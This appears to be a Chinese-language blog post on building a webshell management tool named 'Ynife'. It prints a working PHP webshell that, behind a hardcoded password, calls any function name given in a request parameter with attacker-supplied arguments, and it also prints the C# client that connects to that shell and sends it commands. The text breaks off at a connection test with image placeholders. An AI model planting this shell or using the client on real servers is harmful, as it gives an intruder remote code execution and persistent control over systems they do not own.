webshell:
<?php
@ini_set('display_errors','0');
if($_REQUEST['Ynife_verify'] == "verity" && $_REQUEST['Ynife_password'] == "pass"){
echo "bingo";
}
if($_REQUEST['Ynife_password'] == "pass" && $_REQUEST['Ynife_verify'] == "run"){
if($_REQUEST['Ynife_run_flag'] == "run"){
loader($_REQUEST['loader'],$_REQUEST['Ynife_run_loader']);
}else{
loader($_REQUEST['Ynife_run_loader'],$_REQUEST['Ynife_run']);
}
}
function loader($a,$b){
$cc = run($b);
$a($cc);
}
function run($b){
return $b;
}
?>
image.png
image.png
他叫我约妹子去了。那我就去了。。。
首先看到webshell如何判断是否连接成功,当$_REQUEST['Ynife_verify']
为verity和$_REQUEST['Ynife_password']
等于pass的时候echo一个bingo。师傅看到这里可以就会喷了哈哈哈哈我也觉得。因为后期会改造所以暂时先将就着试试水。
这里回到c#入口函数
Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Ynife
{
internal class Program
{
static void Main(string[] args)
{
string url = args[0];
string password = args[1];
string res = SendData.PostRequest(url, password);
if (res == "bingo")
{
Console.WriteLine("[+]connect success");
SendExecuteCommand.SendCode(url, password);
}
else
{
Console.WriteLine("[-]connect failed");
}
}
}
}
首先接受控制台url加密码其实就是$_REQUEST['Ynife_password']
的值。然后通过SendData类的PostRequest方法发送。跟进PostRequest方法。
public static string PostRequest(string url,string password)
{
string responseData = "";
var client = new WebClient();
WebProxy proxy = new WebProxy("127.0.0.1", 8080);
client.Proxy = proxy;
var data = new NameValueCollection();
data["Ynife_password"] = password;
data["Ynife_verify"] = "verity";
byte[] sendData = Encoding.GetEncoding("GB2312").GetBytes(data.ToString());
client.Headers.Add("ContentLength", sendData.Length.ToString());
byte[] bytes = client.UploadValues(url, "POST", data);
responseData = Encoding.UTF8.GetString(bytes);
return responseData;
}
本地测试开启了8080代理,不用关闭就行。
测试下连接
image.png